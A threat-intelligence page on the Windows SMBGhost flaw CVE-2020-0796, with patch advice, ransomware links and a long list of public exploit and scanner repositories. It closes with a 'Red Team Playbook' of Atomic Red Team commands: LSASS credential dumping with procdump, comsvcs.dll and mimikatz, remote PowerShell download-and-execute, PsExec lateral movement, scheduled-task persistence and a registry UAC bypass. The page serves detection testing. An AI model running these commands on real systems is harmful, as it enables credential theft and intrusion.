CVE-2020-0796
Overview
This vulnerability is a remote code execution flaw caused by improper handling of specially crafted requests in the Microsoft Server Message Block version 3.1.1 (SMBv3) protocol. The root cause lies in the SMBv3 compression feature's failure to correctly validate input data, leading to a buffer overflow condition. The affected component is the SMBv3 client and server implementation in Microsoft Windows 10 versions 1903 and 1909 across multiple architectures including x86, x64, and ARM64.
Vulnerability Description
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending crafted SMBv3 packets to a vulnerable Windows 10 system, resulting in arbitrary code execution with system-level privileges. This enables the attacker to fully compromise the affected host, execute malicious payloads, access sensitive data, and potentially move laterally within a network. No user interaction or valid credentials are required, increasing the risk of widespread exploitation and severe operational disruption.
Solution
Microsoft has released security updates addressing this vulnerability in the Windows 10 versions 1903 and 1909 as detailed in their security advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796. Administrators should apply the corresponding patches for their specific Windows 10 editions and architectures immediately. As a temporary mitigation, disabling SMBv3 compression via registry settings is recommended until updates can be deployed.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability exists within the Microsoft Server Message Block version 3.1.1 (SMBv3) protocol, which is fundamental for file sharing and network communication in Windows environments. This flaw arises from improper handling of certain requests, allowing an attacker to execute arbitrary code on a target system. The exploitation of this vulnerability could occur without user interaction, making it particularly dangerous. Attackers can leverage specially crafted packets sent to a vulnerable SMBv3 server or client, leading to unauthorized access and control over the affected machine. The severity of this vulnerability is underscored by its perfect CVSS score of 10.0, indicating a high potential for impact and exploitation.
The attack vectors associated with this vulnerability are varied, but primarily involve network-based attacks. An attacker could execute a man-in-the-middle attack or simply send malicious packets to a vulnerable SMBv3 service. This could be done over the internet or within an internal network, especially in environments where SMB is used extensively for file sharing and printer services. Once the malicious payload is executed, the attacker could gain full control over the system, allowing them to install malware, exfiltrate sensitive data, or propagate further attacks within the network. The lack of authentication required for exploitation amplifies the risk, as it lowers the barrier for attackers to initiate an exploit.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Windows 10 and Windows Server versions 1903 and 1909. Businesses could face severe operational disruptions, data breaches, and financial losses due to the potential for widespread compromise. The ability to execute arbitrary code remotely means that an attacker could not only target individual machines but also move laterally across the network, affecting multiple systems and services. The reputational damage from a successful exploit could also be substantial, leading to loss of customer trust and potential legal ramifications if sensitive data is compromised.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular patch management is crucial, as Microsoft has released updates to address this flaw. Ensuring that all systems are updated to the latest versions can significantly reduce the risk of exploitation. Additionally, organizations should monitor network traffic for unusual SMB activity, which could indicate an attempted exploit. Employing intrusion detection systems (IDS) and firewalls configured to block unauthorized SMB traffic can further enhance security. Educating employees about the risks associated with SMB and the importance of security hygiene can also play a vital role in prevention.
In conclusion, the vulnerability within the SMBv3 protocol presents a critical threat to Windows-based systems, with the potential for severe consequences if exploited. Organizations must prioritize detection and mitigation strategies to safeguard their networks against this and similar vulnerabilities. By maintaining an up-to-date security posture and fostering a culture of cybersecurity awareness, businesses can better defend against the evolving landscape of cyber threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2020-0796, underscored by the emergence of multiple new proof-of-concept exploits publicly available on GitHub and the introduction of a Metasploit module that significantly lowers the technical barrier for attackers. This expansion in the exploit landscape has coincided with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting its elevated priority for federal cybersecurity efforts. Our telemetry indicates a sharp increase in detection events, signaling active exploitation attempts in the wild. Notably, ransomware groups such as Black Basta and BianLian have been linked to campaigns leveraging this vulnerability, amplifying the risk of impactful ransomware intrusions. The EPSS score’s dramatic rise to a high-risk level corroborates the growing likelihood of exploitation. Collectively, these developments elevate the threat level of CVE-2020-0796 from theoretical to actively exploited, necessitating heightened vigilance from defenders as adversaries increasingly weaponize this critical SMBv3 flaw.
Update 2 — June 19, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2020-0796, accompanied by the emergence of new proof-of-concept tools that enhance adversary capabilities. This development is reflected in a further increase in the Exploit Prediction Scoring System (EPSS) score, now approaching certainty of exploitation, underscoring the vulnerability’s persistent attractiveness to threat actors. Notably, ransomware groups such as Black Basta and BianLian continue to be linked with campaigns leveraging this flaw, reinforcing its role as a vector for high-impact ransomware intrusions. The expansion of the exploit landscape, combined with the sustained rise in detection activity observed by our sensors, elevates the operational risk associated with this vulnerability. Defenders should interpret these trends as indicative of an increasingly active and sophisticated threat environment, where adversaries are rapidly adapting and weaponizing CVE-2020-0796 to achieve remote code execution and lateral movement within compromised networks.
Update 3 — July 10, 2026
CSURFACE threat intelligence has identified a discernible uptick in exploitation attempts targeting CVE-2020-0796, accompanied by the emergence of additional proof-of-concept tools that enhance adversaries’ capabilities to automate and scale attacks. This development signals a maturation of the exploit ecosystem, lowering the technical barriers for threat actors, including ransomware affiliates such as BianLian and Black Basta, to leverage this vulnerability for initial access and lateral movement. Our telemetry indicates that while the overall exploitation trend remains steady, the qualitative shift toward more accessible and user-friendly exploit frameworks increases the likelihood of opportunistic and less sophisticated actors engaging with this vulnerability. Consequently, the operational risk associated with CVE-2020-0796 has intensified, underscoring its continued relevance as a critical vector in ransomware campaigns and broader intrusion efforts.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1903 | N/A |
cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1903 | N/A |
cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1903 | N/A |
cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1909 | N/A |
cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1909 | N/A |
cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1909 | N/A |
cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows Server 1903 | N/A |
cpe:2.3:o:microsoft:windows_server_1903:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 1909 | N/A |
cpe:2.3:o:microsoft:windows_server_1909:-:*:*:*:*:*:x64:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SMBv3 Compression Buffer Overflow
exploits/windows/local/cve_2020_0796_smbghost
|
Daniel García Gutiérrez, Manuel Blanco Parajón, Spencer McIntyre | Unknown | - | View |
|
SMBv3 Compression Buffer Overflow
exploits/windows/smb/cve_2020_0796_smbghost
|
hugeh0ge, chompie1337, Spencer McIntyre | Unknown | - | View |
ExploitDB (3)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC) | eerykitty | dos | windows | - | View |
| Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation | Daniel García Gutiérrez | local | windows | - | View |
| Microsoft Windows - 'SMBGhost' Remote Code Execution | chompie1337 | remote | windows | - | View |
GitHub PoCs (91)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
danigargu/CVE-2020-0796
CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost
|
danigargu | 1357 | 341 | 2020-03-30 | View |
|
ly4k/SMBGhost
Scanner for CVE-2020-0796 - SMBv3 RCE
|
ly4k | 717 | 188 | 2020-03-11 | View |
|
jamf/CVE-2020-0796-RCE-POC
CVE-2020-0796 Remote Code Execution POC
|
jamf | 573 | 170 | 2020-04-20 | View |
|
eerykitty/CVE-2020-0796-PoC
PoC for triggering buffer overflow via CVE-2020-0796
|
eerykitty | 333 | 120 | 2020-03-12 | View |
|
Barriuso/SMBGhost_AutomateExploitation
SMBGhost (CVE-2020-0796) Automate Exploitation and Detection
|
Barriuso | 352 | 49 | 2020-06-10 | View |
|
jamf/CVE-2020-0796-LPE-POC
CVE-2020-0796 Local Privilege Escalation POC
|
jamf | 245 | 85 | 2020-03-30 | View |
|
Rvn0xsy/CVE_2020_0796_CNA
Cobalt Strike AggressorScripts CVE-2020-0796
|
Rvn0xsy | 75 | 16 | 2020-04-06 | View |
|
rsmudge/CVE-2020-0796-BOF
|
rsmudge | 70 | 19 | 2020-09-17 | View |
|
jiansiting/CVE-2020-0796
|
jiansiting | 64 | 23 | 2020-04-01 | View |
|
ioncodes/SMBGhost
Scanner for CVE-2020-0796 - A SMBv3.1.1 + SMB compression RCE
|
ioncodes | 58 | 17 | 2020-03-12 | View |
|
k8gege/PyLadon
Ladon Scanner For Python, Large Network Penetration Scanner & Cobalt Strike, vulnerability / exploit / detection / MS170...
|
k8gege | 51 | 19 | 2019-11-19 | View |
|
jamf/SMBGhost-SMBleed-scanner
SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner
|
jamf | 44 | 15 | 2020-07-06 | View |
|
eastmountyxz/CVE-2020-0796-SMB
该资源为CVE-2020-0796漏洞复现,包括Python版本和C++版本。主要是集合了github大神们的资源,希望您喜欢~
|
eastmountyxz | 33 | 18 | 2020-04-02 | View |
|
T13nn3s/CVE-2020-0796
Powershell SMBv3 Compression checker
|
T13nn3s | 28 | 13 | 2020-03-11 | View |
|
ButrintKomoni/cve-2020-0796
Identifying and Mitigating the CVE-2020–0796 flaw in the fly
|
ButrintKomoni | 17 | 16 | 2020-03-11 | View |
|
maxpl0it/Unauthenticated-CVE-2020-0796-PoC
An unauthenticated PoC for CVE-2020-0796
|
maxpl0it | 22 | 8 | 2020-03-15 | View |
|
thelostworldFree/CVE-2020-0796
PoC RCE Reverse Shell for CVE-2020-0796 (SMBGhost)
|
thelostworldFree | 11 | 18 | 2020-04-22 | View |
|
gabimarti/SMBScanner
Multithread SMB scanner to check CVE-2020-0796 for SMB v3.11
|
gabimarti | 19 | 8 | 2020-03-12 | View |
|
dickens88/cve-2020-0796-scanner
This project is used for scanning cve-2020-0796 SMB vulnerability
|
dickens88 | 14 | 12 | 2020-03-12 | View |
|
GuoKerS/aioScan_CVE-2020-0796
基于asyncio(协程)的CVE-2020-0796 速度还是十分可观的,方便运维师傅们对内网做下快速检测。
|
GuoKerS | 15 | 11 | 2020-03-14 | View |
|
Almorabea/SMBGhost-LPE-Metasploit-Module
This is an implementation of the CVE-2020-0796 aka SMBGhost vulnerability, compatible with the Metasploit Framework
|
Almorabea | 20 | 5 | 2020-06-19 | View |
|
f1tz/CVE-2020-0796-LPE-EXP
Windows SMBv3 LPE exploit 已编译版
|
f1tz | 17 | 7 | 2020-03-31 | View |
|
0x25bit/CVE-2020-0796-PoC
Weaponized PoC for SMBv3 TCP codec/compression vulnerability
|
0x25bit | 18 | 4 | 2020-03-10 | View |
|
joaozietolie/CVE-2020-0796-Checker
Script that checks if the system is vulnerable to CVE-2020-0796 (SMB v3.1.1)
|
joaozietolie | 14 | 7 | 2020-03-11 | View |
|
w1ld3r/SMBGhost_Scanner
Advanced scanner for CVE-2020-0796 - SMBv3 RCE
|
w1ld3r | 14 | 1 | 2020-03-14 | View |
|
jiansiting/CVE-2020-0796-Scanner
CVE-2020-0796-Scanner
|
jiansiting | 9 | 4 | 2020-03-15 | View |
|
0xeb-bp/cve-2020-0796
CVE-2020-0796 (SMBGhost) LPE
|
0xeb-bp | 7 | 6 | 2020-04-07 | View |
|
technion/DisableSMBCompression
CVE-2020-0796 Flaw Mitigation - Active Directory Administrative Templates
|
technion | 9 | 2 | 2020-03-11 | View |
|
dungnm24/CVE-2020-0796
WindowsProtocolTestSuites is to trigger BSoD, and full exploit poc.
|
dungnm24 | 6 | 4 | 2023-05-29 | View |
|
wneessen/SMBCompScan
Scanner script to identify hosts vulnerable to CVE-2020-0796
|
wneessen | 4 | 3 | 2020-03-12 | View |
|
vysecurity/CVE-2020-0796
CVE-2020-0796 - Working PoC - 20200313
|
vysecurity | 5 | 2 | 2020-03-13 | View |
|
orangmuda/CVE-2020-0796
Remote Code Execution POC for CVE-2020-0796
|
orangmuda | 5 | 1 | 2021-10-09 | View |
|
tango-j/CVE-2020-0796
Coronablue exploit
|
tango-j | 4 | 2 | 2020-03-31 | View |
|
sujitawake/smbghost
CVE-2020-0796_CoronaBlue_SMBGhost
|
sujitawake | 3 | 2 | 2020-03-16 | View |
|
julixsalas/CVE-2020-0796
Scanner for CVE-2020-0796
|
julixsalas | 1 | 4 | 2020-03-16 | View |
|
codewithpradhan/SMBGhost-CVE-2020-0796-
To crash Windows-10 easily
|
codewithpradhan | 2 | 2 | 2020-09-28 | View |
|
TinToSer/CVE-2020-0796-LPE
SMBGHOST local privilege escalation
|
TinToSer | 2 | 2 | 2020-03-31 | View |
|
exp-sky/CVE-2020-0796
SMBv3 Ghost (CVE-2020-0796) Vulnerability
|
exp-sky | 3 | 0 | 2020-06-09 | View |
|
laolisafe/CVE-2020-0796
SMBv3 RCE vulnerability in SMBv3
|
laolisafe | 2 | 1 | 2020-03-12 | View |
|
LabDookhtegan/CVE-2020-0796-EXP
CVE-2020-0796-EXP
|
LabDookhtegan | 1 | 2 | 2020-04-02 | View |
|
cory-zajicek/CVE-2020-0796-DoS
DoS PoC for CVE-2020-0796 (SMBGhost)
|
cory-zajicek | 1 | 2 | 2020-03-21 | View |
|
awareseven/eternalghosttest
This repository contains a test case for CVE-2020-0796
|
awareseven | 1 | 2 | 2020-03-12 | View |
|
ran-sama/CVE-2020-0796
Lightweight PoC and Scanner for CVE-2020-0796 without authentication.
|
ran-sama | 1 | 2 | 2020-03-16 | View |
|
netscylla/SMBGhost
SMBGhost (CVE-2020-0796) threaded scanner
|
netscylla | 1 | 2 | 2020-03-12 | View |
|
MasterSploit/LPE---CVE-2020-0796
|
MasterSploit | 2 | 0 | 2020-11-20 | View |
|
Anonimo501/SMBGhost_CVE-2020-0796_checker
|
Anonimo501 | 2 | 0 | 2021-09-04 | View |
|
DannyRavi/nmap-scripts
nmap scripts for vuln cve-2020-0796 & cve-2019-7238 & cve2019-11580 & cve2017-6327
|
DannyRavi | 2 | 0 | 2025-04-20 | View |
|
Dhoomralochana/Scanners-for-CVE-2020-0796-Testing
Scanners List - Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)
|
Dhoomralochana | 1 | 1 | 2020-03-12 | View |
|
xax007/CVE-2020-0796-Scanner
CVE-2020-0796 SMBv3.1.1 Compression Capability Vulnerability Scanner
|
xax007 | 0 | 2 | 2020-03-12 | View |
|
UraSecTeam/smbee
Check system is vulnerable CVE-2020-0796 (SMB v3)
|
UraSecTeam | 0 | 2 | 2020-03-12 | View |
|
BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796
Little scanner to know if a machine is runnig SMBv3 (possible vulnerability CVE-2020-0796)
|
BinaryShadow94 | 1 | 1 | 2020-03-13 | View |
|
OldDream666/cve-2020-0796
cve-2020-0796利用工具集
|
OldDream666 | 1 | 1 | 2023-02-28 | View |
|
Jagadeesh7532/-CVE-2020-0796-SMBGhost-Windows-10-SMBv3-Remote-Code-Execution-Vulnerability
CVE-2020-0796 (SMBGhost) is a critical RCE vulnerability in Windows 10 SMBv3 protocol. It allows attackers to execute co...
|
Jagadeesh7532 | 2 | 0 | 2025-09-21 | View |
|
arzuozkan/CVE-2020-0796
CVE-2020-0796 explanation and researching vulnerability for term porject CENG325
|
arzuozkan | 1 | 0 | 2022-06-07 | View |
|
SEHandler/CVE-2020-0796
CVE-2020-0796
|
SEHandler | 1 | 0 | 2022-11-09 | View |
|
AdamSonov/smbGhostCVE-2020-0796
This script will help you to scan for smbGhost vulnerability(CVE-2020-0796)
|
AdamSonov | 1 | 0 | 2024-03-04 | View |
|
cybermads/CVE-2020-0796
|
cybermads | 1 | 0 | 2025-04-19 | View |
|
Almorabea/SMBGhost-WorkaroundApplier
This script will apply the workaround for the vulnerability CVE-2020-0796 for the SMBv3 unauthenticated RCE
|
Almorabea | 0 | 1 | 2020-03-12 | View |
|
wsfengfan/CVE-2020-0796
CVE-2020-0796 Python POC buffer overflow
|
wsfengfan | 0 | 1 | 2020-03-14 | View |
|
intelliroot-tech/cve-2020-0796-Scanner
This tool helps scan large subnets for cve-2020-0796 vulnerable systems
|
intelliroot-tech | 0 | 1 | 2020-04-14 | View |
|
bacth0san96/SMBGhostScanner
SMBGhost CVE-2020-0796
|
bacth0san96 | 0 | 1 | 2020-05-12 | View |
|
bsec404/CVE-2020-0796
|
bsec404 | 1 | 0 | 2025-01-29 | View |
|
kn6869610/CVE-2020-0796
|
kn6869610 | 0 | 1 | 2020-03-12 | View |
|
datntsec/CVE-2020-0796
|
datntsec | 1 | 0 | 2020-11-10 | View |
|
1stPeak/CVE-2020-0796-Scanner
|
1stPeak | 1 | 0 | 2021-07-14 | View |
|
F6JO/CVE-2020-0796-Batch-scanning
批量扫描CVE-2020-0796
|
F6JO | 1 | 0 | 2021-10-28 | View |
|
p4ncontomat3/smbghost
scanner for CVE-2020-0796
|
p4ncontomat3 | 0 | 0 | 2026-06-26 | View |
|
average-joe44/CVE-2020-0796-Forked-PoC
|
average-joe44 | 0 | 0 | 2026-04-23 | View |
|
average-joe44/CVE-2020-0796-Forked-
|
average-joe44 | 0 | 0 | 2026-04-23 | View |
|
section-c/CVE-2020-0796
|
section-c | 0 | 0 | 2020-04-22 | View |
|
ysyyrps123/CVE-2020-0796
CVE-2020-0796
|
ysyyrps123 | 0 | 0 | 2020-06-02 | View |
|
ysyyrps123/CVE-2020-0796-exp
CVE-2020-0796-exp
|
ysyyrps123 | 0 | 0 | 2020-06-02 | View |
|
1060275195/SMBGhost
批量测试CVE-2020-0796 - SMBv3 RCE
|
1060275195 | 0 | 0 | 2020-06-11 | View |
|
vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-
Description of Exploit SMBGhost CVE-2020-0796
|
vsai94 | 0 | 0 | 2022-03-28 | View |
|
TweatherQ/CVE-2020-0796
CVE-2020-0796-利用工具
|
TweatherQ | 0 | 0 | 2022-12-15 | View |
|
krizzz07/CVE-2020-0796
windows 10 SMB vulnerability
|
krizzz07 | 0 | 0 | 2023-01-29 | View |
|
hungdnvp/POC-CVE-2020-0796
|
hungdnvp | 0 | 0 | 2024-02-23 | View |
|
z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities
This repository contains detailed documentation and code related to the exploitation, detection, and mitigation of two s...
|
z3ena | 0 | 0 | 2024-08-12 | View |
|
nyambiblaise/Microsoft-Windows-SMBGhost-Vulnerability-Checker---CVE-2020-0796---SMBv3-RCE
|
nyambiblaise | 0 | 0 | 2025-12-30 | View |
|
Justjeff211/conti-ransomware-writeup
Conducted a full SOC investigation into a Conti ransomware compromise of an Exchange server using Splunk 8.2.2. Analysed...
|
Justjeff211 | 0 | 0 | 2026-03-27 | View |
|
thai1012/cve-2020-0796
|
thai1012 | 0 | 0 | 2026-02-04 | View |
|
monjheta/CVE-2020-0796
|
monjheta | 0 | 0 | 2025-02-26 | View |
|
esmwaSpyware/DoS-PoC-for-CVE-2020-0796-SMBGhost-
|
esmwaSpyware | 0 | 0 | 2025-08-06 | View |
|
Opensitoo/cve-2020-0796
|
Opensitoo | 0 | 0 | 2021-10-04 | View |
|
halsten/CVE-2020-0796
|
halsten | 0 | 0 | 2020-05-28 | View |
|
AaronCaiii/CVE-2020-0796-POC
CVE-2020-0796-POC
|
AaronCaiii | 0 | 0 | 2020-11-06 | View |
|
maqeel-git/CVE-2020-0796
|
maqeel-git | 0 | 0 | 2025-06-14 | View |
|
Murasame-nc/CVE-2020-0796-LPE-POC
|
Murasame-nc | 0 | 0 | 2021-10-09 | View |
|
tdevworks/CVE-2020-0796-SMBGhost-Exploit-Demo
|
tdevworks | 0 | 0 | 2025-05-17 | View |
|
tripledd/cve-2020-0796-vuln
|
tripledd | 0 | 0 | 2020-03-30 | View |
|
lisinan988/CVE-2020-0796-exp
|
lisinan988 | 0 | 0 | 2021-11-25 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
